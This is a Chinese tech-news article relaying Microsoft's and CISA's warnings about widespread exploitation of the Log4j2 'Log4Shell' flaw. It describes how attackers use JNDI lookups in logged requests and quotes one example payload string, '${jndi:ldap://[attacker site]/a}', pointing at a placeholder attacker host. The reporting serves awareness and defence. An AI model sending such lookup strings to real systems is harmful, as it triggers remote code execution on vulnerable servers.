微软警告比SolarWinds影响更深远的Log4j2漏洞利用
WOT全球技术创新大会2022,门票6折抢购中!购票立减2320元!
微软再次发出了来自具有深厚背景的黑客组织的网络攻击预警,可知问题源于 Java 日志库的 Log4j2 漏洞(CVE-2021-44228)。这家雷德蒙德科技巨头指出,世界多地的黑客已开始利用这项更复杂的日志协议技术,来远程访问受害者的设备。目前观察到的大部分攻击,主要涉及各路人马的大规模扫描。
据悉,微软旗下的多个威胁情报团队 —— 包括 MSTIC 威胁情报中心、 Microsoft 365 Defender 威胁情报团队、RiskIQ 和 DART 检测响应团队 —— 一直在密切关注 Apache Log4j2 的远程代码执行(RCE)漏洞。
CVE-2021-44228 漏洞披露公告指出,被称作“Log4Shell”的漏洞攻击,往往在 Web 日志请求中包含如下字符串:
- ${jndi:ldap://[attacker site]/a}
美国网络安全和基础设施安全局(CISA)也证实了微软的说法,此前该机构同样通报了 Log4Shell 漏洞的广泛利用。
CISA 负责人 Jen Easterly 于昨日接受 CNN 采访时重申,若不迅速采取补救措施,各个联邦机构的设备、服务、乃至整个互联网,都将处于一个相当可怕的境地。
微软警告称,Log4j2 的风险源于两个方面。其一是漏洞可被轻松利用,其二是基于其构建的产品数量 —— 而 Apache Log4j2 就是当前最流行的 Java 日志库之一。
据悉,日志库用于为开发者提供有关服务和产品的附加信息,允许其控制在应用程序执行期间、用户登录特定服务 / 设备的错误报告,并在遇到功能问题时收集相关数据。
通过日志库的使用,开发者还可深入了解或收集设备详情,包括 CPU 类型 / GPU 型号、驱动程序版本、以及系统内存等。
攻击者会对使用 Log4j2 生成日志的目标系统执行 HTTP 请求,该日志利用 JNDI 向攻击者控制的站点执行请求,最终导致被利用的进程访问站点并执行有效负载。
在许多观察到的案例中,攻击者往往拿到了 DNS 日志系统的参数,旨在记录对站点的请求、以对易受攻击的系统进行指纹识别。
此前已知的一种漏洞利用,涉及微软旗下的《我的世界》服务器。攻击者以聊天框作为中部署的消息内容作为管道,试图渗透用户系统并夺得控制权。
事实上,全球许多知名企业都面临着巨大的风险,其中不乏微软、Twitter、苹果、亚马逊、百度、Cloudflare、网易、Cloudflare 等科技巨头。
网络安全公司 Check Point 指出,截至目前,其 GitHub 项目的下载量已经超过 40 万次。遗憾的是,尽管 Apache 已经发布了一个修补程序,但各家公司的实施方案不尽相同。
对于数百上千万的客户来说,这意味着他们仍将在未来一段时间里面临 Log4j 入侵风险,或导致大量用户数据暴露于在外。

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
Meta扩大漏洞悬赏计划 首次纳入数据搜刮类目
WOT全球技术创新大会2022,门票6折抢购中!购票立减2320元! Meta 正在扩大它的漏洞悬赏计划,将报告数据抓取的研究人员纳入其中。这一变化将允许研究人员报告能够进行抓取活动的漏洞,以及之前抓取的已经在网上发布的数据。Meta 在一篇博文中表示,公司应该是业内首个专门针对抓取活动启动悬赏的公司。 安全工程经理 Dan Gurfinkle 在一次简报会上表示:“我们正在寻找那些能使攻击者绕过抓取限制的漏洞,从而获取到超出预期的数据”。和追踪其他“恶意”活动不同,数据搜刮是使用自动化工具从用户的个人资料中大量收集个人信息,如电子邮件地址、电话号码、个人资料照片和其他细节。尽管用户通常愿意在他们公开的 Facebook 档案中分享这些信息,但搜刮者可以更广泛地暴露这些细节,比如在可搜索的数据库中公布这些信息。 Meta 公司也很难打击这种活动。例如,4 月份,超过 5 亿 Facebook 用户的个人信息被公布在一个论坛上。在这种情况下,实际的数据搜刮发生在几年前,而且公司已经解决了潜在的缺陷。但是,一旦数据开始在网上流传,它就无能为力了。在某些情况下,该公司也曾起诉个人的数据窃取行...
- 下一篇
Deepfakes:语音钓鱼即服务(VaaS)的声音“伪装者”
WOT全球技术创新大会2022,门票6折抢购中!购票立减2320元! 研究显示,电子邮件网络钓鱼攻击已激增35%。虽然企业组织正在努力解决这一棘手问题,但网络犯罪分子却已加大赌注转向一种更为复杂的技术——使用先进的Deepfake和语音模拟技术绕过语音授权机制,实施语音网络钓鱼(或vishing)攻击。 数字风险保护公司Digital Shadows的研究部门Photon Research Team警告称,网络犯罪分子正在将网络犯罪提升到一个新的水平,使用深度伪造的音频或视频技术使欺骗行为看起来尽可能可信。更有甚者,网络犯罪分子还在将商用深度伪造和语音模拟工具武器化。 研究人员表示,在Deepfake音频技术的帮助下,威胁行为者可以冒充其目标并绕过语音身份验证机制等安全措施,来授权欺诈交易或欺骗受害者的联系人以收集有价值的情报。 如今,越来越多的银行正在使用语音授权来验证客户的身份。根据生物识别研究机构 Biometric Update的一份报告显示,语音生物识别市场正以22.8%的复合年增长率增长,到2026年将达到39亿美元。 同时,Photon研究人员也观察到,攻击者经常使用声称...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- CentOS8,CentOS7,CentOS6编译安装Redis5.0.7
- Eclipse初始化配置,告别卡顿、闪退、编译时间过长
- 设置Eclipse缩进为4个空格,增强代码规范
- Hadoop3单机部署,实现最简伪集群
- CentOS7编译安装Gcc9.2.0,解决mysql等软件编译问题
- CentOS7编译安装Cmake3.16.3,解决mysql等软件编译问题
- 2048小游戏-低调大师作品
- CentOS6,CentOS7官方镜像安装Oracle11G
- Jdk安装(Linux,MacOS,Windows),包含三大操作系统的最全安装
- SpringBoot2更换Tomcat为Jetty,小型站点的福音